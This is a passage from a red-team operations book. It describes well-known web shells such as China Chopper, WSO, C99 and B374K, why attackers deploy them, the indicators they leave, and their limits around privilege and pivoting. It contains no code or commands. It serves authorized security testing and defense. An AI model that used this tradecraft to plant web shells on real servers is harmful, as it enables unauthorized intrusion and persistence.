1 Joe Vest, James Tubberville Red Team Development and Operations
Web Shell Examples ● China Chopper – A small web shell packed with features. It has several Command and Control features, including a password brute force capability ● WSO – Stands for "web shell by orb" and has the ability to masquerade as an error page containing a hidden login form ● C99 – Aversion of the WSO shell with additional functionality. It can display the server’s security measures and contains a self-delete function ● B374K – A PHP-based web shell with common functionalities such as viewing processes and executing commands Why would a threat use a web shell Remote code execution flaws are limited and have forced the heavy use of client exploitation however, web applications are still very valuable doors into a network, and directly compromising a network via remote means provides many options to a threat. Web applications are commonly overlooked, misconfigured, and riddled with flaws. Executing operating system commands with an on-demand tool is a perfect Long Haul solution and, therefore, a perfect target fora Red Team. A Red Team must be aware of common IOCs generated by the deployment of a web shell: ● The exploitation of a web application flaw must occur The server attack surface is limited to file upload flaws, RFI flaws, or application security flaws This can trigger an alert depending on the type of exploitation or flaw ● Web server files will be added or modified Source code modification or the direct modification of an application’s source code will occur Integrity monitoring may alert defenses to these changes Although the vulnerabilities required for web shell deployment comprise a small subset of application security, those paths are worth pursuing as a threat. Web shells are great tools but do have limits. Operating system commands executed on the target server are in the context of the web service user. If a target has followed best security practices, the service will be running as non-privileged. This may seriously limit a web shell’s capability. An operator may need additional credentials or further exploitation to issue commands with the proper permissions. Even in the case of limited use, web shells can often still be used as pivot points. Other limitations depend on the web server’s communication with other target systems. Web shells may have limited access to internal servers. Web servers in a DMZ or external location may require pivoting through multiple servers to communicate with internal target systems. In any engagement, the maintenance of a solid toolset that includes web shells allows a Red Team to be flexible, which increases its capability.